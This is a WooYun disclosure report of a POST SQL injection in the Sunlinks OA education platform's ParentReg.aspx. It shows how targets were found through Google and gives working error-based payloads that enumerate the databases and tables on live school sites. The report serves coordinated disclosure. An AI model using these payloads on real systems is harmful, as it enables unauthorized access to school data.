当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130335

漏洞标题:某教育电子教学办公平台POST型SQL注入

相关厂商:Sunlinks

漏洞作者: goubuli

提交时间:2015-08-01 11:53

修复时间:2015-11-01 10:44

公开时间:2015-11-01 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-01: 细节已通知厂商并且等待厂商处理中
2015-08-03: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-06: 细节向第三方安全合作伙伴开放
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

RT
喜欢上了手工测注入,发现越来越喜欢了。。。

详细说明:

Sunlinks OA
官网:http://**.**.**.**
案例:http://**.**.**.**/custom-hong.html
官方称:百家教育局用户、两千所中小学用户、百所幼儿园用户
漏洞文件:ParentReg.aspx
参数txtAccount存在POST注入


先看wooyun是否重复

0729_13.png


无重复,于是找些案例继续挖。
Google关键字:

Sunlinks OA


0729_2.png


案例非常多,随便搜集一些:

http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:81/ParentReg.aspx
http://**.**.**.**/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**/ParentReg.aspx
....


案例太多,不一一列举了。
演示一:

http://**.**.**.**:8080/ParentReg.aspx


提交:

S0001%27and%2B1=user--


0729_10.png


演示二:

http://**.**.**.**:8080/ParentReg.aspx


提交:

S0001%27and%2B1=user--


0729_11.png

提交:

S0001%27and+1=@@version--

0729_12.png


演示三、

http://**.**.**.**:8080/ParentReg.aspx


提交:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2Ba1juWNl%2BW4guWkqeahpeWMuuaVmeiCsuWxgGQCAQ8WAh8ABRtodHRwOi8vd3d3LnRxankuY29tLmNuOjgwODBkAgQPEBYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUEY29kZR4LXyFEYXRhQm91bmRnEBUSBuellueItgbnpZbmr40G54i25LqyBuavjeS6sgbkuIjlpKsG5aa75a2QBuWEv%2BWtkAblpbPlhL8G5a2Z5a2QBuWtmeWlswblsrPniLYG5bKz5q%2BNBuWFrOWFrAblqYblqYYG5ZOl5ZOlBuWnkOWnkAblvJ%2FlvJ8G5aa55aa5FRICMDECMDMCMDUCMDcCMDkCMTECMTMCMTUCMTcCMTkCMjECMjMCMjUCMjcCMjkCMzECMzMCMzUUKwMSZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZM96KxDChA1OHGhrIHk7P75G64gO&txtAccount=S0001%27and+1=@@version--&txtPass=dasdf&cmbRelation=01&__VIEWSTATEGENERATOR=4FED9A00


0729_14.png


演示四、

http://**.**.**.**:8080/ParentReg.aspx


提交:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFGOa1juWNl%2BmVv%2Ba4heWunumqjOWwj%2BWtpmQCAQ8WAh8ABRlodHRwOi8vd3d3LmNxc3l4eC5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVEgbnpZbniLYG56WW5q%2BNBueItuS6sgbmr43kurIG5LiI5aSrBuWmu%2BWtkAblhL%2FlrZAG5aWz5YS%2FBuWtmeWtkAblrZnlpbMG5bKz54i2BuWys%2BavjQblhazlhawG5amG5amGBuWTpeWTpQblp5Dlp5AG5byf5byfBuWmueWmuRUSAjAxAjAzAjA1AjA3AjA5AjExAjEzAjE1AjE3AjE5AjIxAjIzAjI1AjI3AjI5AjMxAjMzAjM1FCsDEmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgcPFgIfAAVzPElNRyBoZWlnaHQ9JzE2JyBzcmM9J1VJUmVzb3VyY2UvaW1hZ2VzL3N6anlfbG9naW5fbG9nby5naWYnIHdpZHRoPScxNicgYWxpZ249J2Fic01pZGRsZSc%2BICZuYnNwOyZuYnNwO%2BWKnuWFrOW5s%2BWPsGQCCA8WAh8ABRxTdW5saW5rcyBPQSAuTkVUIHZlcnNpb24gMS4wZGS3rTglxEHhgBSr6HNV9inuN0dPFQ%3D%3D&txtAccount=S0001%27and+1=@@version--&txtPass=a&cmbRelation=01


0729_15.png


演示五、

http://**.**.**.**:8080/ParentReg.aspx


提交:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFGOWVhuays%2BWOv%2BaVmeiCsuS9k%2BiCsuWxgGQCAQ8WAh8ABRtodHRwOi8vd3d3LnNkc2hlZHUuY29tOjgwODBkAgQPEBYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUEY29kZR4LXyFEYXRhQm91bmRnEBURBuellueItgbnpZbmr40G54i25LqyBuavjeS6sgbkuIjlpKsG5aa75a2QBuWEv%2BWtkAblpbPlhL8G5a2Z5a2QBuWtmeWlswblsrPniLYG5bKz5q%2BNBuWFrOWFrAblqYblqYYG5ZOl5ZOlBuWnkOWnkAblvJ%2FlvJ8VEQIwMQIwMwIwNQIwNwIwOQIxMQIxMwIxNQIxNwIxOQIyMQIyMwIyNQIyNwIyOQIzMQIzMxQrAxFnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgcPFgIfAAVzPElNRyBoZWlnaHQ9JzE2JyBzcmM9J1VJUmVzb3VyY2UvaW1hZ2VzL3N6anlfbG9naW5fbG9nby5naWYnIHdpZHRoPScxNicgYWxpZ249J2Fic01pZGRsZSc%2BICZuYnNwOyZuYnNwO%2BWKnuWFrOW5s%2BWPsGQCCA8WAh8ABRxTdW5saW5rcyBPQSAuTkVUIHZlcnNpb24gMS4wZGSR8y1qytl7IYiq1r0AfncKlRFBJOUsd0T2zAphgD2JIA%3D%3D&txtAccount=S0001%27and+1=db_name()--&txtPass=1&cmbRelation=01


0729_16.png


数据库及表信息见漏洞证明。。。

漏洞证明:

随意选取一个案例,下面我们来爆数据库
URL:http://**.**.**.**:8080/ParentReg.aspx
一、判断有几个数据库,技巧:因为报错型注入要把数字转换成字符串型,这里我采用的是STR函数,具体用法不细说
提交:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2BW%2Bt%2BW3nuW4guW%2Bt%2BWfjuWMuuaVmeiCsuWxgGQCAQ8WAh8ABRxodHRwOi8vd3d3LmRjZWR1Lmdvdi5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVBAbniLbkurIG5q%2BN5LqyBueIt%2BeItwblpbblpbYVBAIwMQIwMwIwNQIwNxQrAwRnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZIVNU6ml7e52DM6Fb2AL9ERBbZfu&txtAccount=S0001%27and+1=STR((SELECT count(*) FROM Master..SysDatabases),6,1)--&txtPass=aaa&cmbRelation=01


0729_17.png


一共6个数据库
当前数据库可以通过db_name(),判断是:

在将 nvarchar 值 'OA' 转换成数据类型 int 时失败。


0729_18.png


二、导出所有数据库
用db_name(xxid),xxid从1-6
导出结果为:

master
tempdb
model
msdb
dcDnn.WebShow.2k
OA


三、跑表
先判断多少张表,同上面的方法
提交:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2BW%2Bt%2BW3nuW4guW%2Bt%2BWfjuWMuuaVmeiCsuWxgGQCAQ8WAh8ABRxodHRwOi8vd3d3LmRjZWR1Lmdvdi5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVBAbniLbkurIG5q%2BN5LqyBueIt%2BeItwblpbblpbYVBAIwMQIwMwIwNQIwNxQrAwRnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZIVNU6ml7e52DM6Fb2AL9ERBbZfu&txtAccount=S0001%27and+1=STR((select count(*) from information_schema.tables),6,1)--&txtPass=aaa&cmbRelation=01


0729_19.png


345张表,太多了。。。不一一跑了
贴前20张表吧。。。

Greeting
php_sort_ddzd
Meeting
SubjectMatterType
AssessItems
php_sort_zwgk
GreetingContent
MeetingAddress
Code_JiBie
GreetingGarbage
ClassManager
php_sort_minb
GreetingMaster
ClassMsgBoard
php_sort_ddwx
Duty
AssessList
php_sort_gksx
GreetingReader
DutyEngage
...

修复方案:

过滤

版权声明:转载请注明来源 goubuli@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-03 10:43

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供修复方案。同时,将相关案例下发给对应的CNCERT分中心,由其后续协调网站管理单位处置.

最新状态:

暂无